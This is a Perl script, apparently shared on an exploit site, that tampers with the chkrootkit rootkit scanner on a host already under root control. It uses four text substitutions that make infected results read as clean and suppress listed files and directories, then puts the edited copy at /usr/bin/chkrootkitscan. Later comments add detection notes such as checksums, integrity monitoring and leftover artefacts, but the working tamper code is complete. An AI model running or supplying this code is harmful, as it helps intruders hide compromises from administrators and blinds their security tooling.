A Perl script that backdoors chkrootkit, rendering it useless. Tested on chkrootkit version 0.44 running on Red Hat Enterprise 3.
25f5835469aa6bfe744b1e2b431b83379eda7e12ff32ef7155bc1202e115e406
#!/usr/bin/perl -w
# Anti-antirootkit coded by saic. This code will stop chkrootkit from
# doing its thing. Tested on chkrootkit version 0.44 running on Red Hat
# Enterprise 3. The code can be easily modified for other anti-rootkit
# tools.
#
# Usage: Just run the Perl-script and it'll take care of the rest.
# No, this isn't a script-kiddie tool. Skiddies don't gain root very
# often. You will need write permissions on the files to change (which
# is usually only granted to the superuser). This is NOT some
# root-gaining exploit.
#
# Make sure to drop me an e-mail (introop at gmail dot com) if there are
# updates that may stop this code from working. Oh yeah, this is under the
# GNU GPL by the way. Not that anybody would steal this code, but still.
# Shell donations are welcome as well.
# Tamper routine, annotated for detection and response.
#
# What it does: reads /usr/bin/chkrootkitscan in full, rewrites four text
# patterns so that "infected" outcomes are printed as clean results, moves the
# original to ./chkrootkit.backup, and installs the edited copy at the
# original path. It needs write access to /usr/bin (per the header, normally
# root only), so a successful run implies that privilege was already held.
#
# Detection and mitigation notes:
#   - Compare the scanner with a known-good copy or checksum stored off-host,
#     or run the scanner from trusted read-only media.
#   - The replacement is a newly created file moved into place, so file
#     integrity monitoring on /usr/bin/chkrootkitscan should see a content
#     change (and presumably new inode/mtime -- confirm on the filesystem in use).
#   - Artefacts: chkrootkit.backup, and possibly output.txt, in whatever
#     directory the script was run from.
#   - If the pristine scanner contains the string STATUS=${INFECTED}, a copy
#     in which that string is absent has likely been edited this way.

# Two-argument open (read mode) on the scanner. Any open failure produces the
# same "File not found" message because $! is not included.
open(INFILE, "/usr/bin/chkrootkitscan") or die "File not found, are you sure it's installed?\n File not found:";
print "Editing chkrootkit...\n";
sleep(1);
local $/; # Undefine the input record separator so the next read returns the whole file
$file_content = <INFILE>; # Entire scanner text now held in a package global (no "my")
# Substitution 1: every assignment STATUS=${INFECTED} becomes STATUS=${NOT_INFECTED}.
$file_content =~ s/STATUS=\$\{INFECTED}/STATUS=\$\{NOT_INFECTED}/g; # Status variable forced to the clean value
# Substitution 2: the literal branch text `0) echo "INFECTED"` prints "not infected" instead.
$file_content =~ s/0\)\ echo "INFECTED"/0\)\ echo "not infected"/g;
# Substitution 3: `echo ${files}` is replaced by a fixed "nothing found" string,
# so whatever the scanner collected in ${files} is no longer printed.
$file_content =~ s/echo \$\{files}/echo "nothing found"/g;
# Substitution 4: `echo ${dirs}` is deleted outright, hiding that output as well.
$file_content =~ s/echo \$\{dirs}//g; # $file_content now holds the edited scanner text
close INFILE; # Done with the original file handle
# The original is moved (not copied) to the current working directory; the
# command's exit status is ignored.
readpipe "mv /usr/bin/chkrootkitscan ./chkrootkit.backup"; # Leaves ./chkrootkit.backup as an artefact
# Append-mode, unchecked open of ./output.txt: a pre-existing output.txt in the
# working directory would be kept and extended rather than truncated.
open(OUTFILE, ">>output.txt"); # Temporary file in the current working directory
print OUTFILE ("$file_content"); # Write the edited scanner text
close OUTFILE; # Close result is not checked
# The edited file is moved over the original path and marked executable; again
# no exit status is checked, so a failed step can leave the scanner missing
# from /usr/bin while the script still prints its success message.
readpipe "mv output.txt /usr/bin/chkrootkitscan"; # Edited copy takes the scanner's path
readpipe "chmod +x /usr/bin/chkrootkitscan"; # Adds execute permission to the replacement
print "chkrootkit has been edited.\n";